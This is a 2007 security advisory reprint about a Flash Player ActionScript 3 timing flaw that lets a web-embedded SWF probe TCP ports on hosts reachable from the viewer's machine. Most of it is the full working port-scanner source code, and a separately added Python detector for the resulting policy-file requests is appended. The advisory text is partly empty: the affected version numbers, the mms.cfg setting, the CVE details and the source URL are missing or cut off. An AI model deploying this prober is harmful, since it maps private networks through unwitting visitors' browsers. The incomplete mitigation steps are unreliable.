Dec 24, 2007 - 12:00 a.m.

[EXPL] Socket Connection Timing Can Reveal Information About Network Configuration (Exploit)






The following security advisory was sent to the SecuriTeam mailing list and can be found on the SecuriTeam web site:

Socket Connection Timing Can Reveal Information About Network Configuration (Exploit)


Due to a design flaw in ActionScript 3 socket handling, compiled Flash
movies are able to scan for open TCP ports on any host reachable from the
host running the SWF, bypassing the Flash Player Security Sandbox Model
without the need for DNS rebinding.


Vulnerable Systems:

  • Flash Player version
  • Flash Player version
  • Flash Player version

The following instructions reference the mms.cfg configuration file. For
a general introduction to mms.cfg, see the Adobe Flash Player
Administration Guide.

To disable ActionScript socket functionality:

  1. Ensure that Flash Player, or later, is installed. Visit the
    Adobe Flash Player Download Center to obtain the latest version, or visit
    the Adobe Flash Product page to determine the version currently installed.

  2. Find the location of the file mms.cfg on your system(s). This file may
    already exist, or you may need to create it. You will most likely need
    administrative access to create or edit this file. mms.cfg is located at:

  • Windows: \Macromed\Flash\mms.cfg
    (e.g. C:\WINDOWS\system32\Macromed\Flash\mms.cfg)
  • Mac OS: /Library/Application Support/Macromedia/mms.cfg
  • Linux: /etc/adobe/mms.cfg
  3. Add the following line to mms.cfg:

CVE Information:


/**
 * Flash 9 AS3 TCP-Portprober
 *
 * This ActionScript application was created to detect whether a given TCP port
 * on a given host is reachable from the host the SWF is running on.
 *
 * The application completely bypasses the Flash Player security sandbox model;
 * it actually uses the security model to probe a port. It is based on a timing
 * problem in the SecurityErrorEvent that Adobe introduced with AS3.
 *
 * The SWF currently needs to be reloaded for every port because the
 * SecurityPolicy state is cached in the player. JavaScript is used to
 * implement the actual port scanner.
 *
 * The application will report closed ports for services that understand the
 * "<policy-file-request/>" XML; this is an extremely rare case.
 *
 * @author David Neu <[email protected]>
 * @thx    fukami, SektionEins GmbH - Web Security Auditing and Software
 * @usage  embed in an HTML page and add the parameters host and port;
 *         the application will check whether the port is reachable from the
 *         host the SWF runs on and then call the JavaScript function
 *         "reportResult" with the port number and the port's state (true or false)
 */
package
{
    import flash.display.Sprite;
    import flash.events.Event;
    import flash.events.IOErrorEvent;
    import flash.events.SecurityErrorEvent;
    import flash.events.TimerEvent;
    import flash.external.ExternalInterface;
    import flash.net.Socket;
    import flash.text.TextField;
    import flash.utils.Timer;

    public class Main extends Sprite
    {
        // text field for status viewing
        protected var tf:TextField;

        // the socket that (tries to) connect
        protected var socket:Socket;

        // timer for detecting unanswered policy requests
        protected var timer:Timer;

        // the host to probe
        protected var host:String;

        // the port to probe
        protected var port:Number;

        // Main entry point
        public function Main():void
        {
            // set up the status text field and put it on stage
            tf = new TextField();
            tf.width = 600;
            tf.height = 300;
            addChild(tf);

            // get the port from the parameters
            port = parseInt(this.loaderInfo.parameters['port']);
            if (isNaN(port)) {
                port = 80;
            }

            // get the host from the parameters
            host = this.loaderInfo.parameters['host'];
            if (host == null) {
                host = '';
            }

            // set up the timer
            // If a port is closed and the Flash plugin is not able to write the
            // "<policy-file-request/>" XML to the socket, it immediately fires a
            // SecurityErrorEvent. If the SecurityErrorEvent is not fired within 2
            // seconds we assume that Flash was able to write the XML to the socket
            // and is waiting for a reply -> the port is open. The timer can be
            // reduced a lot to make scanning even faster.
            timer = new Timer(2000, 1);
            timer.addEventListener(TimerEvent.TIMER, onTimer);
            //tf.appendText('interface: ' + ExternalInterface.available);
            //ExternalInterface.call('alert', 'test');

            // start the single probe this SWF instance performs
            probe();
        }

        protected function probe():void
        {
            // show some info text
            tf.appendText('probe host: ' + host + ' port: ' + port);

            // set up the socket and its event listeners
            socket = new Socket();

            // listen to the badly implemented security error
            socket.addEventListener(SecurityErrorEvent.SECURITY_ERROR, onSecurityError);

            // listen to successful connects (should in fact never happen)
            socket.addEventListener(Event.CONNECT, onConnect);

            // listen to IO errors, which will also never occur
            socket.addEventListener(IOErrorEvent.IO_ERROR, onIOError);

            // start the timeout, then try to connect
            timer.start();
            socket.connect(host, port);
        }

        /**
         * Called when the SecurityErrorEvent is fired.
         * When there is a SecurityErrorEvent before the timeout we assume the
         * port is closed.
         * @param e SecurityErrorEvent
         * @return void
         */
        protected function onSecurityError(e:SecurityErrorEvent):void
        {
            portClosed();
        }

        /**
         * Called when the Connect event is fired.
         * When we can connect to a port it is definitely open;
         * this should only happen in very rare cases.
         * @param e Event
         * @return void
         */
        protected function onConnect(e:Event):void
        {
            portOpen();
        }

        /**
         * When we get an IO error the port is closed.
         * As with the connect event, this will only happen in very rare cases.
         * @param e Event
         * @return void
         */
        protected function onIOError(e:Event):void
        {
            portClosed();
        }

        /**
         * When the Flash plugin has waited too long for the reply to the policy
         * request the timer is fired. Assume the port is open, as Flash was able
         * to write the policy request to it.
         * @param e TimerEvent
         * @return void
         */
        protected function onTimer(e:TimerEvent):void
        {
            portOpen();
        }

        /**
         * Show that the port is open and report to the HTML page.
         * @return void
         */
        protected function portOpen():void
        {
            // stop the timer so a rare CONNECT is not reported a second time
            timer.reset();
            tf.appendText('\nOPEN');
            ExternalInterface.call('reportResult', port, "true");
        }

        /**
         * Show that the port is closed and report to the HTML page.
         * @return void
         */
        protected function portClosed():void
        {
            timer.reset();
            tf.appendText('\nCLOSED');
            ExternalInterface.call('reportResult', port, "false");
        }
    }
}
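The prober above classifies a port purely by timing: a closed port makes the player raise SecurityErrorEvent at once, while an open port lets it write the "<policy-file-request/>" XML and wait. A defender sees the other side of that exchange: every open port the SWF reaches receives the policy request as the first payload on the connection, a string that does not belong on an SSH, HTTP or database port. The following Python detector is added here and is not code from the advisory or its author; it flags clients that deliver that string to several non-policy ports within a short window, which is what the per-port reload described above looks like from the server side. The record shape, the sample entries, the window and the threshold are constructed assumptions; TCP port 843 is Adobe's documented default socket policy port, where the request is legitimate.

```python
"""Detect Flash socket-policy requests arriving on ports that are not policy ports.

Constructed example (not part of the advisory). A service or IDS that records
the first bytes of each accepted connection can feed those records to
find_probing_clients(); a client that delivers "<policy-file-request/>" to
several unrelated ports in a short time is behaving like the AS3 port prober.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List, Tuple

# Flash Player writes this string, followed by a NUL byte, to every socket it
# manages to connect to. On the documented socket policy port (843) that is
# expected traffic; anywhere else it is a symptom of a socket probe.
POLICY_REQUEST = b"<policy-file-request/>"
SOCKET_POLICY_PORT = 843


@dataclass(frozen=True)
class FirstPayload:
    """First bytes seen on an accepted connection (constructed record shape)."""
    ts: float        # seconds since epoch, as logged
    src: str         # client address
    dst_port: int    # local port the connection arrived on
    data: bytes      # first payload bytes, as a service or IDS logged them


def is_policy_probe(rec: FirstPayload) -> bool:
    """True when a policy-file request arrives on a port that is not the policy port."""
    return rec.dst_port != SOCKET_POLICY_PORT and rec.data.startswith(POLICY_REQUEST)


def find_probing_clients(records: Iterable[FirstPayload],
                         window: float = 60.0,
                         min_ports: int = 3) -> Dict[str, List[int]]:
    """Map each flagged client to the sorted distinct ports it sent policy requests to.

    A client is flagged when at least `min_ports` distinct non-policy ports
    received the request within any `window` seconds. A single stray request
    (a Flash application pointed at the wrong port) is therefore ignored.
    """
    by_src: Dict[str, List[Tuple[float, int]]] = defaultdict(list)
    for rec in records:
        if is_policy_probe(rec):
            by_src[rec.src].append((rec.ts, rec.dst_port))

    flagged: Dict[str, List[int]] = {}
    for src, hits in by_src.items():
        hits.sort()  # time order so the window below is contiguous
        start = 0
        for end in range(len(hits)):
            # slide the window start forward until it spans at most `window` seconds
            while hits[end][0] - hits[start][0] > window:
                start += 1
            ports_in_window = {port for _, port in hits[start:end + 1]}
            if len(ports_in_window) >= min_ports:
                flagged[src] = sorted({port for _, port in hits})
                break
    return flagged


# Constructed sample: 10.0.0.5 runs the prober against four ports in a few
# seconds, 10.0.0.9 is a normal client that also fetches a real policy file,
# 10.0.0.7 sends one stray request.
SAMPLE = [
    FirstPayload(1000.0, "10.0.0.9", 80, b"GET / HTTP/1.1\r\nHost: intranet\r\n"),
    FirstPayload(1001.0, "10.0.0.5", 22, b"<policy-file-request/>\x00"),
    FirstPayload(1003.5, "10.0.0.5", 80, b"<policy-file-request/>\x00"),
    FirstPayload(1004.0, "10.0.0.9", 843, b"<policy-file-request/>\x00"),
    FirstPayload(1006.2, "10.0.0.5", 443, b"<policy-file-request/>\x00"),
    FirstPayload(1008.9, "10.0.0.5", 3306, b"<policy-file-request/>\x00"),
    FirstPayload(1010.0, "10.0.0.9", 22, b"SSH-2.0-OpenSSH_4.7\r\n"),
    FirstPayload(2000.0, "10.0.0.7", 8080, b"<policy-file-request/>\x00"),
]


if __name__ == "__main__":
    for src, ports in find_probing_clients(SAMPLE).items():
        print(f"{src} delivered Flash policy requests to {len(ports)} ports: {ports}")
```

Only open ports ever receive the request, so the detector sees exactly the set the scanner classified as open; the closed ports it tried leave nothing but refused connections, which a firewall log can correlate on the same client address.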


The information has been provided by <mailto:[email protected]> David
The original article can be found at: <;


